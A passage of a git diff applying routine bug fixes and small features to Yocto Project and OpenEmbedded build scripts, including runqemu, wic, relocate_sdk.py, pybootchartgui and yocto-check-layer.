                     " For example, A->B, B->C, A->C, then A->C can be removed.",
             action="store_true", default=False)
 
+        parser.epilog = """
+Examples:
+First generate the .dot file:
+    bitbake -g core-image-minimal
+
+To find out why a package is being built:
+    %(prog)s -k <package> -w ./task-depends.dot
+
+To find out what a package depends on:
+    %(prog)s -k <package> -d ./task-depends.dot
+
+Reduce the .dot file packages only, no tasks:
+    %(prog)s -r ./task-depends.dot
+"""
+
         self.args = parser.parse_args()
 
         if len(sys.argv) != 3 and len(sys.argv) < 5:
@@ -99,6 +114,10 @@ class Dot(object):
                 if key == "meta-world-pkgdata":
                     continue
                 dep = m.group(2)
+                key = key.split('.')[0]
+                dep = dep.split('.')[0]
+                if key == dep:
+                    continue
                 if key in depends:
                     if not key in depends[key]:
                         depends[key].add(dep)
diff --git a/scripts/oe-pkgdata-browser b/scripts/oe-pkgdata-browser
index 8d223185a4..65a6ee956e 100755
--- a/scripts/oe-pkgdata-browser
+++ b/scripts/oe-pkgdata-browser
@@ -236,6 +236,8 @@ class PkgUi():
         update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False)
 
     def load_recipes(self):
+        if not os.path.exists(pkgdata):
+            sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata)
         for recipe in sorted(os.listdir(pkgdata)):
             if os.path.isfile(os.path.join(pkgdata, recipe)):
                 self.recipe_iters[recipe] = self.recipe_store.append([recipe])
diff --git a/scripts/oe-pkgdata-util b/scripts/oe-pkgdata-util
index 93220e3617..75dd23efa3 100755
--- a/scripts/oe-pkgdata-util
+++ b/scripts/oe-pkgdata-util
@@ -598,6 +598,9 @@ def main():
             logger.error("Unable to find bitbake by searching parent directory of this script or PATH")
             sys.exit(1)
         logger.debug('Found bitbake path: %s' % bitbakepath)
+        if not os.environ.get('BUILDDIR', ''):
+            logger.error("This script can only be run after initialising the build environment (e.g. by using oe-init-build-env)")
+            sys.exit(1)
         tinfoil = tinfoil_init()
         try:
             args.pkgdata_dir = tinfoil.config_data.getVar('PKGDATA_DIR')
diff --git a/scripts/oe-run-native b/scripts/oe-run-native
index 4e63e69cc4..22958d97e7 100755
--- a/scripts/oe-run-native
+++ b/scripts/oe-run-native
@@ -43,7 +43,7 @@ fi
 OLD_PATH=$PATH
 
 # look for a tool only in native sysroot
-PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin/*-native -maxdepth 1 -type d -printf ":%p")
+PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin -maxdepth 1 -name "*-native" -type d -printf ":%p")
 tool_find=`/usr/bin/which $tool 2>/dev/null`
 
 if [ -n "$tool_find" ] ; then
diff --git a/scripts/oe-setup-builddir b/scripts/oe-setup-builddir
index 30eaa8efbe..5a51fa793f 100755
--- a/scripts/oe-setup-builddir
+++ b/scripts/oe-setup-builddir
@@ -113,10 +113,10 @@ if [ ! -z "$SHOWYPDOC" ]; then
     cat <<EOM
 The Yocto Project has extensive documentation about OE including a reference
 manual which can be found at:
-    http://yoctoproject.org/documentation
+    https://docs.yoctoproject.org
 
 For more information about OpenEmbedded see their website:
-    http://www.openembedded.org/
+    https://www.openembedded.org/
 
 EOM
 #    unset SHOWYPDOC
diff --git a/scripts/postinst-intercepts/update_font_cache b/scripts/postinst-intercepts/update_font_cache
index 46bdb8c572..900db042d6 100644
--- a/scripts/postinst-intercepts/update_font_cache
+++ b/scripts/postinst-intercepts/update_font_cache
@@ -5,6 +5,8 @@
 
 set -e
 
+rm -f $D${fontconfigcachedir}/CACHEDIR.TAG
+
 PSEUDO_UNLOAD=1 ${binprefix}qemuwrapper -L $D -E ${fontconfigcacheenv} $D${libexecdir}/${binprefix}fc-cache --sysroot=$D --system-only ${fontconfigcacheparams}
 
 chown -R root:root $D${fontconfigcachedir}
diff --git a/scripts/pybootchartgui/pybootchartgui/draw.py b/scripts/pybootchartgui/pybootchartgui/draw.py
index 53324b9f8b..fc708b55c3 100644
--- a/scripts/pybootchartgui/pybootchartgui/draw.py
+++ b/scripts/pybootchartgui/pybootchartgui/draw.py
@@ -267,11 +267,14 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range):
     # avoid divide by zero
     if max_y == 0:
         max_y = 1.0
-    xscale = float (chart_bounds[2]) / (max_x - x_shift)
+    if (max_x - x_shift):
+        xscale = float (chart_bounds[2]) / (max_x - x_shift)
+    else:
+        xscale = float (chart_bounds[2])
     # If data_range is given, scale the chart so that the value range in
     # data_range matches the chart bounds exactly.
     # Otherwise, scale so that the actual data matches the chart bounds.
-    if data_range:
+    if data_range and (data_range[1] - data_range[0]):
         yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0])
         ybase = data_range[0]
     else:
diff --git a/scripts/pybootchartgui/pybootchartgui/parsing.py b/scripts/pybootchartgui/pybootchartgui/parsing.py
index b42dac6b88..9d6787ec5a 100644
--- a/scripts/pybootchartgui/pybootchartgui/parsing.py
+++ b/scripts/pybootchartgui/pybootchartgui/parsing.py
@@ -128,7 +128,7 @@ class Trace:
     def compile(self, writer):
 
         def find_parent_id_for(pid):
-            if pid is 0:
+            if pid == 0:
                 return 0
             ppid = self.parent_map.get(pid)
             if ppid:
diff --git a/scripts/relocate_sdk.py b/scripts/relocate_sdk.py
index 8c0fdb986a..8079d13750 100755
--- a/scripts/relocate_sdk.py
+++ b/scripts/relocate_sdk.py
@@ -97,11 +97,12 @@ def change_interpreter(elf_file_name):
             if (len(new_dl_path) >= p_filesz):
                 print("ERROR: could not relocate %s, interp size = %i and %i is needed." \
                     % (elf_file_name, p_memsz, len(new_dl_path) + 1))
-                break
+                return False
             dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path))
             f.seek(p_offset)
             f.write(dl_path)
             break
+    return True
 
 def change_dl_sysdirs(elf_file_name):
     if arch == 32:
@@ -215,6 +216,7 @@ else:
 
 executables_list = sys.argv[3:]
 
+errors = False
 for e in executables_list:
     perms = os.stat(e)[stat.ST_MODE]
     if os.access(e, os.W_OK|os.R_OK):
@@ -240,7 +242,8 @@ for e in executables_list:
         arch = get_arch()
         if arch:
             parse_elf_header()
-            change_interpreter(e)
+            if not change_interpreter(e):
+                errors = True
             change_dl_sysdirs(e)
 
     """ change permissions back """
@@ -253,3 +256,6 @@ for e in executables_list:
         print("New file size for %s is different. Looks like a relocation error!", e)
         sys.exit(-1)
 
+if errors:
+    print("Relocation of one or more executables failed.")
+    sys.exit(-1)
diff --git a/scripts/runqemu b/scripts/runqemu
index cc87ea871a..4dfc0e2d38 100755
--- a/scripts/runqemu
+++ b/scripts/runqemu
@@ -764,7 +764,7 @@ class BaseConfig(object):
                 raise RunQemuError('BIOS not found: %s' % bios_match_name)
 
         if not os.path.exists(self.bios):
-            raise RunQemuError("KERNEL %s not found" % self.bios)
+            raise RunQemuError("BIOS %s not found" % self.bios)
 
 
     def check_mem(self):
@@ -974,17 +974,14 @@ class BaseConfig(object):
             else:
                 self.nfs_server = '192.168.7.1'
 
-        # Figure out a new nfs_instance to allow multiple qemus running.
-        ps = subprocess.check_output(("ps", "auxww")).decode('utf-8')
-        pattern = '/bin/unfsd .* -i .*\.pid -e .*/exports([0-9]+) '
-        all_instances = re.findall(pattern, ps, re.M)
-        if all_instances:
-            all_instances.sort(key=int)
-            self.nfs_instance = int(all_instances.pop()) + 1
-
-        nfsd_port = 3049 + 2 * self.nfs_instance
-        mountd_port = 3048 + 2 * self.nfs_instance
+        nfsd_port = 3048 + self.nfs_instance
+        lockdir = "/tmp/qemu-port-locks"
+        self.make_lock_dir(lockdir)
+        while not self.check_free_port('localhost', nfsd_port, lockdir):
+            self.nfs_instance += 1
+            nfsd_port += 1
 
+        mountd_port = nfsd_port
         # Export vars for runqemu-export-rootfs
         export_dict = {
             'NFS_INSTANCE': self.nfs_instance,
@@ -1034,6 +1031,17 @@ class BaseConfig(object):
         self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % (
             self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper')))
 
+    def make_lock_dir(self, lockdir):
+        if not os.path.exists(lockdir):
+            # There might be a race issue when multi runqemu processess are
+            # running at the same time.
+            try:
+                os.mkdir(lockdir)
+                os.chmod(lockdir, 0o777)
+            except FileExistsError:
+                pass
+        return
+
     def setup_slirp(self):
         """Setup user networking"""
 
@@ -1052,14 +1060,7 @@ class BaseConfig(object):
         mac = 2
 
         lockdir = "/tmp/qemu-port-locks"
-        if not os.path.exists(lockdir):
-            # There might be a race issue when multi runqemu processess are
-            # running at the same time.
-            try:
-                os.mkdir(lockdir)
-                os.chmod(lockdir, 0o777)
-            except FileExistsError:
-                pass
+        self.make_lock_dir(lockdir)
 
         # Find a free port to avoid conflicts
         for p in ports[:]:
@@ -1099,14 +1100,7 @@ class BaseConfig(object):
             logger.error("ip: %s" % ip)
             raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found")
 
-        if not os.path.exists(lockdir):
-            # There might be a race issue when multi runqemu processess are
-            # running at the same time.
-            try:
-                os.mkdir(lockdir)
-                os.chmod(lockdir, 0o777)
-            except FileExistsError:
-                pass
+        self.make_lock_dir(lockdir)
 
         cmd = (ip, 'link')
         logger.debug('Running %s...' % str(cmd))
@@ -1328,6 +1322,8 @@ class BaseConfig(object):
 
         for ovmf in self.ovmf_bios:
             format = ovmf.rsplit('.', 1)[-1]
+            if format == "bin":
+                format = "raw"
             self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf)
 
         self.qemu_opt += ' ' + self.qemu_opt_script
@@ -1421,13 +1417,13 @@ class BaseConfig(object):
             logger.debug('Running %s' % str(cmd))
             subprocess.check_call(cmd)
         self.release_taplock()
-        self.release_portlock()
 
         if self.nfs_running:
             logger.info("Shutting down the userspace NFS server...")
             cmd = ("runqemu-export-rootfs", "stop", self.rootfs)
             logger.debug('Running %s' % str(cmd))
             subprocess.check_call(cmd)
+        self.release_portlock()
 
         if self.saved_stty:
             subprocess.check_call(("stty", self.saved_stty))
@@ -1514,7 +1510,8 @@ def main():
 
         def sigterm_handler(signum, frame):
             logger.info("SIGTERM received")
-            os.kill(config.qemupid, signal.SIGTERM)
+            if config.qemupid:
+                os.kill(config.qemupid, signal.SIGTERM)
             config.cleanup()
             # Deliberately ignore the return code of 'tput smam'.
             subprocess.call(["tput", "smam"])
diff --git a/scripts/verify-bashisms b/scripts/verify-bashisms
index fb0cc719ea..14d8c298e9 100755
--- a/scripts/verify-bashisms
+++ b/scripts/verify-bashisms
@@ -100,7 +100,7 @@ if __name__=='__main__':
     args = parser.parse_args()
 
     if shutil.which("checkbashisms.pl") is None:
-        print("Cannot find checkbashisms.pl on $PATH, get it from https://anonscm.debian.org/cgit/collab-maint/devscripts.git/plain/scripts/checkbashisms.pl")
+        print("Cannot find checkbashisms.pl on $PATH, get it from https://salsa.debian.org/debian/devscripts/raw/master/scripts/checkbashisms.pl")
         sys.exit(1)
 
     # The order of defining the worker function,
diff --git a/scripts/wic b/scripts/wic
index 24700f380f..99a8a97ccb 100755
--- a/scripts/wic
+++ b/scripts/wic
@@ -22,9 +22,9 @@ import sys
 import argparse
 import logging
 import subprocess
+import shutil
 
 from collections import namedtuple
-from distutils import spawn
 
 # External modules
 scripts_path = os.path.dirname(os.path.realpath(__file__))
@@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'):
             break
         sdkroot = os.path.dirname(sdkroot)
 
-bitbake_exe = spawn.find_executable('bitbake')
+bitbake_exe = shutil.which('bitbake')
 if bitbake_exe:
     bitbake_path = scriptpath.add_bitbake_lib_path()
     import bb
@@ -206,7 +206,7 @@ def wic_create_subcommand(options, usage_str):
             logger.info("  (Please check that the build artifacts for the machine")
             logger.info("   selected in local.conf actually exist and that they")
             logger.info("   are the correct artifacts for the image (.wks file)).\n")
-            raise WicError("The artifact that couldn't be found was %s:\n  %s", not_found, not_found_dir)
+            raise WicError("The artifact that couldn't be found was %s:\n  %s" % (not_found, not_found_dir))
 
     krootfs_dir = options.rootfs_dir
     if krootfs_dir is None:
@@ -312,6 +312,8 @@ def wic_init_parser_create(subparser):
 
     subparser.add_argument("-o", "--outdir", dest="outdir", default='.',
                       help="name of directory to create image in")
+    subparser.add_argument("-w", "--workdir",
+                      help="temporary workdir to use for intermediate files")
     subparser.add_argument("-e", "--image-name", dest="image_name",
                       help="name of the image to use the artifacts from "
                            "e.g. core-image-sato")
diff --git a/scripts/yocto-check-layer b/scripts/yocto-check-layer
index b7c83c8b54..dd930cdddd 100755
--- a/scripts/yocto-check-layer
+++ b/scripts/yocto-check-layer
@@ -24,7 +24,7 @@ import scriptpath
 scriptpath.add_oe_lib_path()
 scriptpath.add_bitbake_lib_path()
 
-from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_signatures, check_bblayers
+from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_layer_dependencies, get_signatures, check_bblayers
 from oeqa.utils.commands import get_bb_vars
 
 PROGNAME = 'yocto-check-layer'
@@ -51,6 +51,8 @@ def main():
             help='File to output log (optional)', action='store')
     parser.add_argument('--dependency', nargs="+",
             help='Layers to process for dependencies', action='store')
+    parser.add_argument('--no-auto-dependency', help='Disable automatic testing of dependencies',
+            action='store_true')
     parser.add_argument('--machines', nargs="+",
             help='List of MACHINEs to be used during testing', action='store')
     parser.add_argument('--additional-layers', nargs="+",
@@ -121,6 +123,21 @@ def main():
     if not layers:
         return 1
 
+    # Find all dependencies, and get them checked too
+    if not args.no_auto_dependency:
+        depends = []
+        for layer in layers:
+            layer_depends = get_layer_dependencies(layer, dep_layers, logger)
+            if layer_depends:
+                for d in layer_depends:
+                    if d not in depends:
+                        depends.append(d)
+
+        for d in depends:
+            if d not in layers:
+                logger.info("Adding %s to the list of layers to test, as a dependency", d['name'])
+                layers.append(d)
+
     shutil.copyfile(bblayersconf, bblayersconf + '.backup')
     def cleanup_bblayers(signum, frame):
         shutil.copyfile(bblayersconf + '.backup', bblayersconf)
@@ -138,6 +155,9 @@ def main():
                 layer['type'] == LayerType.ERROR_BSP_DISTRO:
             continue
 
+        # Reset to a clean backup copy for each run
+        shutil.copyfile(bblayersconf + '.backup', bblayersconf)
+
         if check_bblayers(bblayersconf, layer['path'], logger):
             logger.info("%s already in %s. To capture initial signatures, layer under test should not present "
                "in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name']))
@@ -149,17 +169,13 @@ def main():
         logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'],
             layer['path']))
 
-        shutil.copyfile(bblayersconf + '.backup', bblayersconf)
-
         missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger)
         if not missing_dependencies:
             for additional_layer in additional_layers:
                 if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger):
                     missing_dependencies = True
                     break
-        if not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) or \
-           any(map(lambda additional_layer: not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger),
-                   additional_layers)):
+        if missing_dependencies:
             logger.info('Skipping %s due to missing dependencies.' % layer['name'])
             results[layer['name']] = None
             results_status[layer['name']] = 'SKIPPED (Missing dependencies)'